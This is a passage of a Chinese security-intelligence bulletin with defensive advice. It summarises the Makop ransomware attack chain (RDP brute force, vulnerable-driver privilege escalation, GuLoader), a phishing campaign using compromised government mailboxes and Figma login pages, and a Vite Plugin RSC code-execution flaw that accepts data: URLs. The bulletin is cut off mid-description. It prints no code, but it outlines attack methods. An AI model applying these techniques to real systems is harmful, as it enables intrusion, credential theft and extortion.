0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">公开漏洞与现成工具结合，暴力破解入侵企业并横向渗透加密系统</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jfbe92df"><span leaf="">攻击方式关键词：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">暴力破解（T1110.003）、漏洞利用（T1190）、权限提升（T1068）、防御逃避（T1562）、恶意软件部署（T1204.002）、命令与控制（T1071）、数据加密（T1486）、横向移动（T1021）、凭证滥用（T1550）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8jfbe912l2" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">情报来源：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://cybersecuritynews.com/makop-ransomware-exploits-rdp-systems/" target="_blank">https://cybersecuritynews.com/makop-ransomware-exploits-rdp-systems/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jfbe9u5k" style="font-size: 14px;">Makop 勒索软件作为 Phobos 恶意软件家族变种，2020 年被发现后攻击手法持续演化，对全球企业构成重大威胁。其以 RDP 为入口，通过 NLBrute 等工具暴力破解弱密码或重复认证信息获取初步访问权限，随后部署 NetScan 等网络扫描工具探查内部架构与高价值目标。攻击者利用多款已知本地权限提升漏洞及存在漏洞的合法驱动程序，通过 BYOVD 技术获取内核级权限，禁用或绕过安全软件，还借助 GuLoader 交付恶意载荷，用迷惑性文件名在非标准目录执行以规避检测。该攻击链系统化、多阶段，最终实现网络控制与数据加密以实施勒索，可能导致企业数据加密、敏感信息泄露及业务中断，安全措施不足时损失将加剧。</span></p><p style="text-align: center;" nodeleaf=""><img data-imgfileid="100027341" class="rich_pages wxw-img" data-ratio="0.4310897435897436" data-s="300,640" data-type="png" data-w="624" style="width:100%;" type="block" data-backw="570" data-backh="246" src="https://wechat2rss.xlab.app/img-proxy/?k=95a98567&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWVBic0uuInOf1HfPH4GOiacicr2dl9AFJevXLNoKNxRuoDjfNvGP2oWjT0C8wjofMOGg1nicsAPVHkKtg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jfbe9191w" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigjhckvru" style="font-size: 14px;">加强 RDP 访问管理与密码策略，关闭不必要远程端口，及时修补漏洞，部署入侵检测与行为监控系统，实施网络分段隔离，严格管控合法工具与驱动程序使用。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigs0671rar"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, &#34;PingFang SC&#34;;font-weight: bold;color: rgb(0, 0, 0);line-height: 22px;text-align: left;" data-mid=""><span leaf="" mpa-font-style="md8m9c40qpa" style="font-size: 32px;" data-mpa-action-id="md8m9c51feg" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">05</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">利用受损邮箱账户发送恶意PDF附件进行认证欺诈窃取用户凭证</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jgv1e12ce"><span leaf="">攻击方式关键词：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">有效账户（T1078）、恶意链接（T1204.001）、恶意文件（T1204.002）、鱼叉式钓鱼附件（T1566.001）、通过第三方服务的鱼叉式钓鱼（T1566.003）、收集受害者身份信息（T1589）</span></span></p></li><li><p><span mpa-font-style="md8jgv1e17rl" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">情报来源：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/ongoing-malicious-campaign-abuses-public-administration-accounts-via-pdf-attachments-and-figma-access/" target="_blank">https://www.hendryadrian.com/ongoing-malicious-campaign-abuses-public-administration-accounts-via-pdf-attachments-and-figma-access/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jgv1ev8f" style="font-size: 14px;">2025 年 12 月 8 日起，部分公共行政机关邮箱账户被攻陷，攻击者利用这些受损邮箱对同类用户发起大规模钓鱼攻击。邮件通过密件抄送隐藏收件人，附恶意 PDF 附件，用户点击附件内 “REVIEW DOCUMENTS” 按钮后，会被重定向至真实 Figma 页面，要求通过邮箱或 Google 账号登录认证，此举可能用于收集用户信息或为后续攻击铺垫。攻击借助合法平台增强可信度，隐蔽性较强。响应机构已证实至少两家机构受影响，通过相关渠道上报恶意链接并共享 IoC 信息协助防御。此次攻击可能导致用户凭证被盗、敏感信息泄露，引发后续针对性攻击，削弱对合法服务的信任。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jgv1e1i81" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigs05r1tnb" style="font-size: 14px;">受影响机构检查邮箱安全，加强邮件及附件检测，启用多因素认证，关注 IoC 信息并开展用户安全教育，防范社交工程攻击。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, &#34;PingFang SC&#34;;font-weight: bold;color: rgb(34, 44, 255);line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px rgb(34, 44, 255);text-align: left;" data-mid=""><span leaf="">03</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8incu1uzj" style="font-size: 20px;" data-mpa-action-id="md8incuv1bwi" data-pm-slice="0 0 []">重点漏洞情报</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m951ldxp" style="font-size: 32px;" data-mpa-action-id="md8m952lbd3" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Vite Plugin RSC 远程代码执行漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-67489）</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 76, 65);">严重</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf=""><a href="https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-j76j-5p5g-9wfr" target="_blank">https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-j76j-5p5g-9wfr</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">Vite Plugin RSC 是 Vite 构建工具的一个官方插件，专门用于在 Vite 项目中支持 React Server Components (RSC) 开发。 据官方描述，在 Vite Plugin RSC 插件 0.5.5 及之前的版本中，由于其开发服务器处理 RSC 服务端函数 API（如 loadServerAction、decodeReply、decodeAction）时，内部依赖的动态导入（import()）未对传入的模块标识符（id）进行安全检查，允许加载如 data:text/javascript,... 这样的数据 URL，导致当 Vite 开发服务器通过 --host 或配置 server.host 选项暴露于网络时，远程攻击者可通过向服务端函数端点发送包含恶意模块标识符的特制请求，在服务器上以 Node.js 权限执行任意 JavaScript 